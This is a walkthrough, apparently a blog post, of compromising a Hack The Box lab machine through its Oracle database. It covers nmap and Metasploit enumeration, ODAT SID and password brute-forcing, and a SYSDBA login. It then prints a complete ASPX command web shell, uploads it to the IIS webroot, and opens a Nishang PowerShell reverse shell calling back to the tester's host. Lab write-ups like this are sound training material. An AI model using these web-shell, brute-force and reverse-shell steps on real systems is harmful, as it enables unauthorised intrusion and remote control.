Oracle DB exploit using ODAT Link to heading
Refer some of the nmap scan results here during the pentest
sudo nmap -sS -T4 -sV -sC 10.10.10.82 1 ⨯
[sudo] password for rocky:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-24 06:14 EST
Nmap scan report for 10.10.10.82
Host is up (0.089s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 401 Unauthorized
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 15s, deviation: 0s, median: 14s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-24T11:16:31
|_ start_date: 2022-02-24T00:28:20
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.34 seconds
SomeTheory on Oracle DB(from pentest point of view) Link to heading
The above Nmap results shows 1521 port is open and there are some reference for oracle DB as well. 1521 is the port which oracle DB uses to communicate with external servers or applications. The key points if we know 1521 is open to identify the SID.We can call SID as unique database identifier. One of the Method is Bruteforcing. I could see some on metasploit as well.
msf6 > search TNS
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
1 exploit/windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
2 exploit/windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
3 auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal No Oracle TNS Listener Checker
4 auxiliary/admin/oracle/tnscmd 2009-02-01 normal No Oracle TNS Listener Command Issuer
5 auxiliary/admin/oracle/sid_brute 2009-01-07 normal No Oracle TNS Listener SID Brute Forcer
6 auxiliary/scanner/oracle/sid_brute normal No Oracle TNS Listener SID Bruteforce
7 auxiliary/scanner/oracle/sid_enum 2009-01-07 normal No Oracle TNS Listener SID Enumeration
8 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query
Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/oracle/tnslsnr_version
msf6 > use auxiliary/scanner/oracle/sid_enum
msf6 auxiliary(scanner/oracle/sid_enum) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/oracle/sid_enum) > show options
Module options (auxiliary/scanner/oracle/sid_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/sid_enum) > set RHOSTS 10.10.10.82
Tried some inbuilt tool in Kali and it give some response . but no useful informtion
tnscmd10g status -h 10.10.10.82
sending (CONNECT_DATA=(COMMAND=status)) to 10.10.10.82:1521
writing 89 bytes
reading
.a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4))))
TNS poisoning Link to heading
Upto some versions(12g) I read there is TNS poision exploit( kind of bruteforce) which can get us information about oracle DB. Ours is 11g and there are some ways to check if the version is vulnarable. We can use msf scan which is allowed in OSCP.
msf6 > search tns
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
1 exploit/windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
2 exploit/windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
3 auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal No Oracle TNS Listener Checker
4 auxiliary/admin/oracle/tnscmd 2009-02-01 normal No Oracle TNS Listener Command Issuer
5 auxiliary/admin/oracle/sid_brute 2009-01-07 normal No Oracle TNS Listener SID Brute Forcer
6 auxiliary/scanner/oracle/sid_brute normal No Oracle TNS Listener SID Bruteforce
7 auxiliary/scanner/oracle/sid_enum 2009-01-07 normal No Oracle TNS Listener SID Enumeration
8 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query
Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/oracle/tnslsnr_version
msf6 > use auxiliary/scanner/oracle/tnspoison_checker
msf6 auxiliary(scanner/oracle/tnspoison_checker) > show options
Module options (auxiliary/scanner/oracle/tnspoison_checker):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/tnspoison_checker) > set RHOSTS 10.10.10.82
RHOSTS => 10.10.10.82
msf6 auxiliary(scanner/oracle/tnspoison_checker) > show options
Module options (auxiliary/scanner/oracle/tnspoison_checker):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.82 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/tnspoison_checker) > run
[+] 10.10.10.82:1521 - 10.10.10.82:1521 is vulnerable
[*] 10.10.10.82:1521 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
ODAT Link to heading
It says the destination is vulnrarable to use TNS poisoing.There is tool [ODAT](odat/README.md at master-python3 · quentinhardy/odat · GitHub) which can be installed in Kali. Installation is not straight forward after below commands.
There are some additinal packages and some rpm files(oracle cleint) which needs to be download and configured. The below talks about the oracle client packages
I have used below code to download some versions of oracle cleint. At the tie of installation you can choose any versions avilable during the time.
cd odat
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:04-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28068712 (27M) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-basiclite-19.8.0. 100%[========================================================================================>] 26.77M 1.58MB/s in 29s
2022-02-24 22:21:33 (950 KB/s) - ‘oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm’ saved [28068712/28068712]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:39-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 702872 (686K) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-sqlplus-19.8.0.0. 100%[========================================================================================>] 686.40K 1.17MB/s in 0.6s
2022-02-24 22:21:40 (1.17 MB/s) - ‘oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm’ saved [702872/702872]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:55-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 612416 (598K) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-devel-19.8.0.0.0- 100%[========================================================================================>] 598.06K 1.22MB/s in 0.5s
2022-02-24 22:21:56 (1.22 MB/s) - ‘oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm’ saved [612416/612416]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ sudo alien --to-deb *.rpm
[sudo] password for rocky:
sudo: alien: command not found
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ sudo apt install alien 1 ⨯
Reading package lists... Done
Building dependency tree... Done
──(rocky㉿kali)-[~/tool/exp/odat]
└─$ ls /usr/lib/oracle
19.6 19.8
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ export ORACLE_HOME=/usr/lib/oracle/19.8/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ pip install cx_Oracle
pip install pycryptodome==3.4.3
pip install passlib
pip install python-libnmap
The above image show the /etc/profile updated you can use any version of 19.x which is shows from your output “ls /usr/lib/oracle”
Test the access with sqlmap( some time you need open it in different session for testing to make the configuration affect)
─$ sqlplus
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:09:52 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Enter user-name
Find the SID using ODAT Link to heading
$ ./odat.py sidguesser -s 10.10.10.82 2 ⨯
05:05:16 ERROR -: Impossible to load local configuration files in conf/ and to set driver_name: module 'cx_Oracle' has no attribute 'init_oracle_client'
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ################################################################################################################## | ETA: 00:00:02
100% |#####################################################################################################################################################| Time: 00:03:51
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#####################################################################################################################################################| Time: 00:00:07
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ################################################################################################### | ETA: 00:00:21
100% |#####################################################################################################################################################| Time: 00:03:21
[+] SIDs found on the 10.10.10.82:1521 server: XE
Another method is Using the msfconsole Link to heading
We can get same infor using metasploit and if you search some uses hydra which is one of the great brute forcing tool
msf6 > search tns
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
1 exploit/windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
2 exploit/windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
3 auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal No Oracle TNS Listener Checker
4 auxiliary/admin/oracle/tnscmd 2009-02-01 normal No Oracle TNS Listener Command Issuer
5 auxiliary/admin/oracle/sid_brute 2009-01-07 normal No Oracle TNS Listener SID Brute Forcer
6 auxiliary/scanner/oracle/sid_brute normal No Oracle TNS Listener SID Bruteforce
7 auxiliary/scanner/oracle/sid_enum 2009-01-07 normal No Oracle TNS Listener SID Enumeration
8 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query
msf6 auxiliary(scanner/oracle/sid_enum) > use auxiliary/scanner/oracle/sid_brute
msf6 auxiliary(scanner/oracle/sid_brute) > show otions
[-] Invalid parameter "otions", use "show -h" for more information
msf6 auxiliary(scanner/oracle/sid_brute) > show options
Module options (auxiliary/scanner/oracle/sid_brute):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metaspl
oit
RPORT 1521 yes The target port (TCP)
SID no A specific SID to attempt.
SID_FILE /usr/share/metasploit-framework/data/wordlists/s no File containing instance names, one per line
id.txt
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/oracle/sid_brute) > set RHOSTs 10.10.10.82
RHOSTs => 10.10.10.82
Bruteforcing using ODAT to get DB’s username/Passowrd Link to heading
As we get SID, we can try using the default credentails of oracle DB
In this case the default credentails ( scott/tiger) works for learing purpose you can try the bruteforce using (odat/metasploit/hydra)
─$ ./odat.py passwordguesser -d XE -s 10.10.10.82 -p 1521 1 ⨯
23:54:52 ERROR -: Impossible to load local configuration files in conf/ and to set driver_name: module 'cx_Oracle' has no attribute 'init_oracle_client'
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
The login cis has already been tested at least once. What do you want to do: | ETA: 00:04:42
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:20:04
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:18:10
[!] Notice: 'dip' account is locked, so skipping this username for password | ETA: 00:15:39
[!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:10:01
[!] Notice: 'mdsys' account is locked, so skipping this username for password## | ETA: 00:06:27
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password############# | ETA: 00:04:36
[!] Notice: 'outln' account is locked, so skipping this username for password######################## | ETA: 00:04:01
[+] Valid credentials found: scott/tiger. Continue... ############################################### | ETA: 00:02:01
[!] Notice: 'xdb' account is locked, so skipping this username for password########################################################################## | ETA: 00:00:22
100% |#####################################################################################################################################################| Time: 00:09:17
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
The same can be buteforce with specific user/pass combination which can be downloaded from Internet using below command
./odat.py passwordguesser -d XE -s 10.10.10.82 -p 1521 –accounts-file /usr/share/wordlists/user-pass.txt
Since found the username/password/Database.Lets test the access using the sqlplus
sqlplus scott/tiger@10.10.10.82:1521/XE
sqlplus scott/tiger@10.10.10.82:1521/XE
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:19:04 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> SET PAGESIZE 500;
SQL> SET LINESIZE 500;
SQL> SELECT * FROM V$VERSION;
BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
PL/SQL Release 11.2.0.2.0 - Production
CORE 11.2.0.2.0 Production
TNS for 64-bit Windows: Version 11.2.0.2.0 - Production
NLSRTL Version 11.2.0.2.0 - Production
SQL> SELECT * FROM all_users;
USERNAME USER_ID CREATED
------------------------------ ---------- ---------
XS$NULL 2147483638 29-MAY-14
SCOTT 48 01-JAN-18
APEX_040000 47 29-MAY-14
APEX_PUBLIC_USER 45 29-MAY-14
FLOWS_FILES 44 29-MAY-14
HR 43 29-MAY-14
MDSYS 42 29-MAY-14
ANONYMOUS 35 29-MAY-14
XDB 34 29-MAY-14
CTXSYS 32 29-MAY-14
APPQOSSYS 30 29-MAY-14
DBSNMP 29 29-MAY-14
ORACLE_OCM 21 29-MAY-14
DIP 14 29-MAY-14
OUTLN 9 29-MAY-14
SYSTEM 5 29-MAY-14
SYS 0 29-MAY-14
17 rows selected.
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
SQL> exit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
Escalating the privilege of normal DBA user to SYSDBA Link to heading
The user role seems limited.There is role in Oracle DB"[SYSDBA](SYSDBA and SYSOPER System Privileges)" which equvalaent to “sudo”. Let’s try to assign user “scott"the additinal privilege by this command.The Same command above can be appended with “as sysdba” which will add the escalated privilege as SYSDBA
sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:26:09 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
SYS APEX_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_USER_ROLE YES YES NO
SYS AUTHENTICATEDUSER YES YES NO
SYS CONNECT YES YES NO
SYS CTXAPP YES YES NO
SYS DATAPUMP_EXP_FULL_DATABASE YES YES NO
SYS DATAPUMP_IMP_FULL_DATABASE YES YES NO
SYS DBA YES YES NO
SYS DBFS_ROLE YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SYS EXP_FULL_DATABASE YES YES NO
SYS GATHER_SYSTEM_STATISTICS YES YES NO
SYS HS_ADMIN_EXECUTE_ROLE YES YES NO
SYS HS_ADMIN_ROLE YES YES NO
SYS HS_ADMIN_SELECT_ROLE YES YES NO
SYS IMP_FULL_DATABASE YES YES NO
SYS LOGSTDBY_ADMINISTRATOR YES YES NO
SYS OEM_ADVISOR YES YES NO
SYS OEM_MONITOR YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS PLUSTRACE YES YES NO
SYS RECOVERY_CATALOG_OWNER YES YES NO
SYS RESOURCE YES YES NO
SYS SCHEDULER_ADMIN YES YES NO
SYS SELECT_CATALOG_ROLE YES YES NO
SYS XDBADMIN YES YES NO
SYS XDB_SET_INVOKER YES YES NO
SYS XDB_WEBSERVICES YES YES NO
SYS XDB_WEBSERVICES_OVER_HTTP YES YES NO
SYS XDB_WEBSERVICES_WITH_PUBLIC YES YES NO
32 rows selected.
To see the actual privilege which scott has
$ sudo odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
[sudo] password for rocky:
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
[2] (10.10.10.82:1521): Testing all modules on the XE SID with the SCOTT/tiger account
[2.1] UTL_HTTP library ?
[+] OK
[2.2] HTTPURITYPE library ?
[+] OK
[2.3] UTL_FILE library ?
[+] OK
[2.4] JAVA library ?
[-] KO
[2.5] DBMSADVISOR library ?
[+] OK
[2.6] DBMSSCHEDULER library ?
[-] KO
[2.7] CTXSYS library ?
[+] OK
[2.8] Hashed Oracle passwords ?
[+] OK
[2.9] Hashed Oracle passwords from history?
[+] OK
[2.10] DBMS_XSLPROCESSOR library ?
[+] OK
[2.11] External table to read files ?
[+] OK
[2.12] External table to execute system commands ?
[+] OK
[2.13] Oradbg ?
[-] KO
[2.14] DBMS_LOB to read files ?
[+] OK
[2.15] SMB authentication capture ?
[+] Perhaps (try with --capture to be sure)
[2.16] Gain elevated access (privilege escalation)?
[2.16.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[+] OK
[2.16.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[2.16.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[2.16.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[2.16.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[2.17] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[+] Impossible to know
[2.18] Create file on target (CVE-2018-3004)?
[-] KO
[2.19] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[-] KO
Refer the terms which are “OK”
If you refer the [ODAT github](odat/odat_mind_map_v1.0.jpg at master-python3 · quentinhardy/odat · GitHub) page it will show the functionalities available. Lets use these available functions to upload the file(reverse shell)
I have tied .txt and .php file upload and found .txt upload works and using the mutiple extensions upload, i could see only aspx works. However the ASPX reverse shell code using msfvenom contain large number of characters. I am using the local aspx shell from Kali.This also needs to be foramtted a little bit. The actual shell can be found here.
└─$ locate cmdasp
/home/rocky/hckbox/Bounty/cmdasp.aspx
/home/rocky/hckbox/granny/cmdasp.aspx
/usr/share/webshells/asp/cmdasp.asp
/usr/share/webshells/aspx/cmdasp.aspx
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ wc -c cmdasp.aspx
1400 cmdasp.aspx
After formating I have uploaded the [test shell ](Rchitect/cmdnew.aspx at Yoda · tcprks/Rchitect · GitHub)here.
─$ cat cmdasp.aspx | tr -d '\n'
<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><HEAD><title>awen asp.net webshell</title></HEAD><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label></form></body></HTML><!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) --><!-- http://michaeldaw.org 04/2007 -->
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ cat cmdasp.aspx | tr -d '\n' > cmd.aspx
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ wc -c cmd.aspx
1358 cmd.aspx
Upload now using the command format below
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ ./odat.py dbmsxslprocessor --sysdba -s 10.10.10.82 -U scott -P tiger -d XE --putFile "C:\\inetpub\\wwwroot\\" "rchitect.aspx" "/home/rocky/hckbox/silo/rchitect.aspx"
07:54:03 ERROR -: Impossible to load local configuration files in conf/ and to set driver_name: module 'cx_Oracle' has no attribute 'init_oracle_client'
[1] (10.10.10.82:1521): Put the /home/rocky/hckbox/silo/rchitect.aspx local file in the C:\inetpub\wwwroot\ path (named rchitect.aspx) of the 10.10.10.82 server
[+] The /home/rocky/hckbox/silo/rchitect.aspx local file was put in the remote C:\inetpub\wwwroot\ path (named rchitect.aspx)
I can access the cmdshell from browser
Let’s use the Nishang’s Powershell script for reverse shell access:
$ tail -1 Invoke-PowerShellTcp.ps1
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ tail -5 Invoke-PowerShellTcp.ps1
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 4444
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.82 - - [25/Feb/2022 08:29:31] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
$ rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.82] 49168
Windows PowerShell running as user SILO$ on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>